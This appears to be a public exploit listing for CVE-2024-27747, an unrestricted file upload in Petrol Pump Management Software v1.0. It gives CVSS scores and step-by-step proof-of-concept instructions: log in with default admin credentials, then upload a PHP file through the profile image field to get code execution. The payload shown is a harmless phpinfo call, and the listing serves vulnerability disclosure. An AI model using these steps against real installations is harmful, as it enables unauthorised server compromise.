Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Vulnerability

2024-03-0400:00:00

Shubham Pandey

0day.today

107

exploit

software

vendor

vulnerability

windows

linux

cve-2024-27747

file upload

remote code execution

payload

profile component

php

reference

shubham pandey

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.4

Confidence

Low

EPSS

0.006

Percentile

79.0%

JSON

# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload 
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27747
# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default [email protected] and
Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the phpinfo.php file in "Image" field
5. Phpinfo will be present in "
http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of phpinfo.php file is given below:
<?php phpinfo();?>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md